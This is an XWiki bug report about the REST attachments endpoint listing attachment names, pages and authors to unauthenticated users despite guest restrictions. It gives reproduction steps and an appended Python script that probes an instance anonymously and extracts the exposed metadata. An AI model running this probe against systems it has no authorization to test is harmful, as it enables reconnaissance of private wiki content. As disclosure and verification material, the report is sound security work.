Details
Type: Bug
Resolution: Fixed
Priority: Critical
Affects Version/s: 1.8.1, 1.9 M1
Environment: XWiki in Kubernetes using xwiki:15.10.11-postgres-tomcat
Description
Hello,
I was testing the XWiki REST API for implementing some custom scripts when I noticed that the /rest/wikis/WikiName/attachments endpoint does not require authentication. Using the "number" query parameter to increase the result count, I am able to get complete lists of wiki attachments including metadata like authors.
It is important to mention that this access only allows a listing of attachments and metadata. However, I still find it rather critical as things like hierarchy, names of files, page naming, and authors can still reveal sensitive information.
I did test my configuration in a number of ways and did not find a way to disable this access. The two "exclude unregistered users" checkboxes are set and I restricted the Guest User denying every right. I also tested in multiple browsers and on private devices to exclude any chance of unnoticed persisting sessions.
It would be great if you could confirm if this is intended behavior or a bad configuration from my side. For testing, I was able to use two separate instances of image 15.10.11-postgres-tomcat. For user authentication we use the oidc-authenticator, but that is not relevant for API access (right?).
To reproduce:
- remove view from guest on the whole wiki
- logout
- access http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/attachments
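The reproduction steps above, turned into a repeatable check. This is an added example, not part of the bug report or of XWiki's own code: it sends the GET with no cookie or Authorization header (the "logout" step), uses the `number` paging parameter the reporter mentions (`start` is assumed to be the companion offset parameter), and reports the pages, file names and authors an unauthenticated caller can read. The element names (`attachment`, `name`, `pageId`, `author`, `size`) follow the XWiki REST attachment model as assumed here, and the sample response body is constructed so the parsing can be exercised offline.

```python
"""Anonymous probe for the wiki-wide XWiki REST attachments listing.

Added example, not part of the bug report or of XWiki. Element names are
assumed from the XWiki REST attachment model; SAMPLE_BODY is constructed.
"""
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

XWIKI_NS = "{http://www.xwiki.org}"

# Constructed sample: what an affected instance would answer to an anonymous GET.
SAMPLE_BODY = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<attachments xmlns="http://www.xwiki.org">
  <attachment>
    <id>xwiki:Finance.Budget2024@draft-salaries.xlsx</id>
    <name>draft-salaries.xlsx</name>
    <size>48213</size>
    <version>1.3</version>
    <pageId>xwiki:Finance.Budget2024</pageId>
    <mimeType>application/vnd.openxmlformats-officedocument.spreadsheetml.sheet</mimeType>
    <author>XWiki.jdoe</author>
  </attachment>
  <attachment>
    <id>xwiki:HR.Offboarding@checklist.pdf</id>
    <name>checklist.pdf</name>
    <size>10240</size>
    <version>2.1</version>
    <pageId>xwiki:HR.Offboarding</pageId>
    <mimeType>application/pdf</mimeType>
    <author>XWiki.asmith</author>
  </attachment>
</attachments>
"""


def attachments_url(base_url, wiki, number=100, start=0):
    """Build the wiki-wide listing URL; number/start are the REST paging params (assumed)."""
    return f"{base_url.rstrip('/')}/rest/wikis/{wiki}/attachments?number={number}&start={start}"


def parse_attachments(xml_text):
    """Extract the fields the report calls sensitive: page name, file name, author."""
    root = ET.fromstring(xml_text)
    entries = []
    for att in root.iter(XWIKI_NS + "attachment"):
        entries.append({
            "page": att.findtext(XWIKI_NS + "pageId", ""),
            "name": att.findtext(XWIKI_NS + "name", ""),
            "author": att.findtext(XWIKI_NS + "author", ""),
            "size": int(att.findtext(XWIKI_NS + "size", "0") or 0),
        })
    return entries


def summarize(entries):
    """Collapse the listing into the structural facts it reveals (pages, authors)."""
    return {
        "attachments": len(entries),
        "pages": sorted({e["page"] for e in entries}),
        "authors": sorted({e["author"] for e in entries}),
    }


def classify(status, entries):
    """Interpret the anonymous response: 'protected', 'leaks', 'empty' or 'unexpected'."""
    if status in (401, 403):
        return "protected"
    if status == 200:
        return "leaks" if entries else "empty"
    return "unexpected"


def probe(base_url, wiki, number=100):
    """Perform the anonymous GET against a live instance and classify the outcome."""
    req = urllib.request.Request(
        attachments_url(base_url, wiki, number),
        headers={"Accept": "application/xml"},  # no Cookie, no Authorization: guest view
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    entries = parse_attachments(body) if status == 200 else []
    return status, entries, classify(status, entries)


if __name__ == "__main__":
    if len(sys.argv) >= 3:  # e.g. http://127.0.0.1:8080/xwiki xwiki
        status, entries, verdict = probe(sys.argv[1], sys.argv[2])
    else:  # no target given: run the parser on the constructed sample
        status, entries = 200, parse_attachments(SAMPLE_BODY)
        verdict = classify(status, entries)
    print(f"HTTP {status}: {verdict}", summarize(entries))
```

Run it as `python probe.py http://127.0.0.1:8080/xwiki xwiki` after denying view to guest on the whole wiki; a fixed instance should come back as "protected" (or "empty"), while an affected one returns "leaks" together with the page names and authors exposed. A 200 with an empty list is reported separately because it is ambiguous: it can mean rights are enforced by filtering, or simply that the wiki has no attachments.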
Issue Links
- is caused by: XWIKI-3483 Add wiki-wide and space-wide resources for attachments and pages (Closed)
- is duplicated by: XWIKI-22427 Anyone can access all space or page attachments list and metadata via REST API (Closed)